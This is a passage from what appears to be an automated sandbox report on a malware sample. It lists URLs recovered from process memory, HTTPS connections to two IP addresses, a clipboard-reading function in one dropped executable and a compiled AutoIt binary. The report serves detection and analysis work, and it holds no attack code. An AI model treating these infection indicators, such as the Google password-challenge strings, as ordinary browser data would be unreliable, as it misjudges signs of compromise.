Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3497708315.000000000163A000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3496995219.000000000163A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: r5mqFEC.exe, 0000000A.00000003.2527758180.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2935168287.000002651B0E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: r5mqFEC.exe, 0000000A.00000003.2461952567.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2461845852.0000000005A6B000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3495369049.0000000001638000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826345784.000000000570B000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826632924.0000000005709000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: r5mqFEC.exe, 0000000A.00000003.2527390883.0000000005B44000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000022.00000002.2935168287.000002651B0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/YK
Source: r5mqFEC.exe, 0000000A.00000003.2527390883.0000000005B44000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000023.00000002.2933641554.0000027907590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/sig
Source: firefox.exe, 00000022.00000002.2934028870.000002651AC8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challengI
Source: firefox.exe, 00000034.00000002.2983000129.0000016D7A5F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001E.00000002.2835524999.0000014CA1171000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2842023659.0000026ECDE90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2983000129.0000016D7A5FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000022.00000002.2934028870.000002651AC80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2937859693.000002651B194000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2933641554.0000027907594000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2933837593.00000279075B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50275 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50377
Source: unknown Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown Network traffic detected: HTTP traffic on port 50321 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 50281 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50287
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 50287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50273 -> 443
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.6:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50321 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00434470 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 10_2_00434470
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00434470 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 10_2_00434470

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: d986826e57.exe, 00000010.00000000.2782383899.0000000000602000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_077b7e4e-6
Source: d986826e57.exe, 00000010.00000000.2782383899.0000000000602000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_453e1de3-b
Source: d986826e57.exe, 00000029.00000002.3003709713.0000000000602000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6683f1c2-c
Source: d986826e57.exe, 00000029.00000002.3003709713.0000000000602000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSO